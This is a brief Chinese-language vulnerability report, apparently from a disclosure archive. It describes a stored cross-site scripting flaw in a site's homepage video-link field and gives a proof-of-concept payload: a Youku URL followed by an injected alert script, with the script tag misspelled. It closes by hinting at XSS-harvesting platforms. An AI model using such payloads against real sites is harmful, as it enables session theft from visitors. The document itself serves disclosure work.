### 简要描述:
### 详细说明:
首页视频处未过滤,在视频链接后加入代码即可执行
### 漏洞证明:
POC:
在视频链接中填入
```
http://v.youku.com/v_show/id_XNTM2OTY3NjQw.html"><scirpt>alert(/xss/)</script>
```
[<img src="https://images.seebug.org/upload/201304/2814484722fc33e15df597ff05486539810a292f.jpg" alt="6666.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201304/2814484722fc33e15df597ff05486539810a292f.jpg)
至于能做什么,xsser.me之类,大家都懂的。
暂无评论